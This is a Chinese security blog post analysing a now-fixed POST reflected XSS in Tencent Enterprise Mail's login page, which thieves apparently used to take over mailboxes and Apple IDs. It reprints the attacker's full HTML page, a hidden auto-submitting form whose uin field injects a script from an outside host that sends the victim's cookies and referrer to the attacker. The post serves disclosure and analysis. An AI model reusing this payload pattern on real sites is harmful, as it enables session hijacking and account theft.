腾讯企业邮箱跨站漏洞分析

  • 内容
  • 相关

Author: Evi1m0#KnownSec


中午朋友发来一个帖子询问我《朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID》是什么原理,之后和 RickGray 看了下是利用腾讯企业邮箱的 POST XSS 进行的盗取登录操作,从而登录受害者邮箱获取 APPLE ID。(目前腾讯已经修复此漏洞)


Target: http://eeee.washbowl.com.cn/


View-Source:

1.jpg


源码写入两个 iframe ,恶意代码在 /htmlpage5.html 中:

<html>
<head>
    <meta charset="utf-8" />
    <title>qqjs4</title>
</head>
<body>
    <script>
        function test(PARAMS) {
            var temp = document.createElement("form");
            temp.acceptCharset = "utf-8";
            //By Wfox
            temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
            temp.method = "post";
            temp.style.display = "none";
            for (var x in PARAMS) {
                var opt = document.createElement("textarea");
                opt.name = x;
                opt.value = PARAMS[x];
                temp.appendChild(opt);
            }
            document.body.appendChild(temp);
            temp.submit();
        }
        test({
            uin: '\\"</script><script src=http://ryige.com/q/8></script>',
        });
    </script>
</body>
</html>
脚本创建 action 目标为腾讯企业邮箱的登录地址 form 表单,调用 test() 函数传入 uin 的参数值为 XSS Payload。
// 这个 POST 反射型 XSS 是由于企业邮箱登录报错未做过滤处理导致:

2.jpg


参数 uin ,攻击者注入 http://ryige.com/q/8 脚本:

3.jpg


Payload 将获取企业邮箱的 document.cookie & document.referrer 并发送给攻击者。

本文标签:

版权声明:若无特殊注明,本文皆为《w0ai1uo》原创,转载请保留文章出处。

本文链接:腾讯企业邮箱跨站漏洞分析 - https://www.w0ai1uo.org/133.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

1条评论
    00:00 / 00:00
    随机播放